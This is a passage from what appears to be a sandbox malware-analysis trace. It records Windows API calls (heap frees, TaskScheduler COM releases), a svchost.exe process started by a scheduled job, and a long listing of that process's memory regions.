returned 0x0 [0122.133] TaskScheduler:IUnknown:Release (This=0x8ca61a8) returned 0x0 [0122.134] IUnknown:Release (This=0x8ca7398) returned 0x0 [0122.134] CoUninitialize () [0122.134] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca34350 | out: hHeap=0x7e0000) returned 1 [0122.134] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4ae0 | out: hHeap=0x7e0000) returned 1 [0122.134] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9b0140 | out: hHeap=0x7e0000) returned 1 [0122.134] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4b30 | out: hHeap=0x7e0000) returned 1 [0122.134] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca662c8 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4978 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4b08 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9679e0 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4928 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca65c98 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca3fc40 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91be00 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd50 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adf90 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca66320 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x1026c770 | out: hHeap=0x7e0000) returned 1 [0122.135] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x102a4ea0 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc40 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc30 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc967f80 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd70 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91be10 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4748 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca3ab20 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc967bc0 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4720 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca3adf8 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adf20 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ade78 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4658 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4630 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4568 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4518 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e43d8 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4608 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e44f0 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adc80 | out: hHeap=0x7e0000) returned 1 [0122.142] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae230 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adba0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ade08 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae070 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4450 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e44a0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e46f8 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9addd0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e47c0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4590 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4428 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4798 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adfc8 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e45b8 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4478 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e43b0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4540 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4388 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca65b90 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e44c8 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e45e0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4338 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4310 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4770 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4400 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4360 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e46d0 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae118 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca65c40 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9add98 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ade40 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e41f8 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4108 | out: hHeap=0x7e0000) returned 1 [0122.143] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4220 | out: hHeap=0x7e0000) returned 1 [0122.144] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4018 | out: hHeap=0x7e0000) returned 1 [0122.144] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4180 | out: hHeap=0x7e0000) returned 1 [0122.144] GetLastError () returned 0x0 [0122.144] GetAsyncKeyState (vKey=3) returned 0 [0122.144] SafeArrayDestroyData (psa=0x6f7f50) returned 0x0 Thread: id = 16 os_tid = 0xd44 Thread: id = 17 os_tid = 0xcfc Thread: id = 18 os_tid = 0xcd4 Thread: id = 19 os_tid = 0xcd8 Thread: id = 100 os_tid = 0xccc [0124.868] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x3bc) returned 0xca83768 [0124.868] GetCurrentThreadId () returned 0xccc Thread: id = 101 os_tid = 0xc78 [0127.876] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x3bc) returned 0xc7dd838 [0127.877] GetCurrentThreadId () returned 0xc78 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75956000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 698 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 699 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 700 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 701 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 702 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 703 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 704 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 705 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 706 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 707 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 708 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 709 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 710 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 711 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 712 start_va = 0x410000 end_va = 0x416fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 713 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 714 start_va = 0x430000 end_va = 0x431fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 715 start_va = 0x440000 end_va = 0x441fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 716 start_va = 0x460000 end_va = 0x464fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 717 start_va = 0x470000 end_va = 0x47ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 718 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 719 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 720 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 721 start_va = 0x5d0000 end_va = 0x5d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 722 start_va = 0x5e0000 end_va = 0x5e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 723 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 724 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 725 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 726 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 727 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 728 start_va = 0x8b0000 end_va = 0x8bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 729 start_va = 0x8c0000 end_va = 0x8c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 730 start_va = 0x8d0000 end_va = 0x8d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 731 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 732 start_va = 0x8f0000 end_va = 0x8f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 733 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 734 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 735 start_va = 0xb90000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 736 start_va = 0xc90000 end_va = 0xc93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 737 start_va = 0xca0000 end_va = 0xcb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 738 start_va = 0xcc0000 end_va = 0xcc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 739 start_va = 0xcd0000 end_va = 0xd14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 740 start_va = 0xd20000 end_va = 0xd2cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 741 start_va = 0xd30000 end_va = 0xd36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 742 start_va = 0xd40000 end_va = 0xd41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 743 start_va = 0xdc0000 end_va = 0xdc8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 744 start_va = 0xdd0000 end_va = 0xdd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 745 start_va = 0xde0000 end_va = 0xde1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 746 start_va = 0xdf0000 end_va = 0xdf9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 747 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 748 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 749 start_va = 0x1000000 end_va = 0x1336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 750 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 751 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 752 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 753 start_va = 0x15c0000 end_va = 0x15c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015c0000" filename = "" Region: id = 754 start_va = 0x15d0000 end_va = 0x15e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 755 start_va = 0x15f0000 end_va = 0x15f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000015f0000" filename = "" Region: id = 756 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 757 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 758 start_va = 0x1800000 end_va = 0x18dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 759 start_va = 0x18e0000 end_va = 0x18f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 760 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 761 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 762 start_va = 0x1a80000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 763 start_va = 0x1b80000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 764 start_va = 0x1c80000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 765 start_va = 0x1d00000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 766 start_va = 0x1d80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 767 start_va = 0x1e80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 768 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 769 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 770 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 771 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 772 start_va = 0x2380000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 773 start_va = 0x2480000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 774 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 775 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 776 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 777 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 778 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 779 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 780 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 781 start_va = 0x2c00000 end_va = 0x2c8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 782 start_va = 0x2c90000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 783 start_va = 0x2d10000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 784 start_va = 0x2e10000 end_va = 0x2f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 785 start_va = 0x2f10000 end_va = 0x2f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 786 start_va = 0x2f90000 end_va = 0x2fa0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 787 start_va = 0x2fb0000 end_va = 0x2fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 788 start_va = 0x2fd0000 end_va = 0x2fd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 789 start_va = 0x2fe0000 end_va = 0x30dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 790 start_va = 0x30e0000 end_va = 0x315ffff monitored = 1 entry_point = 0x0 region_type = private name 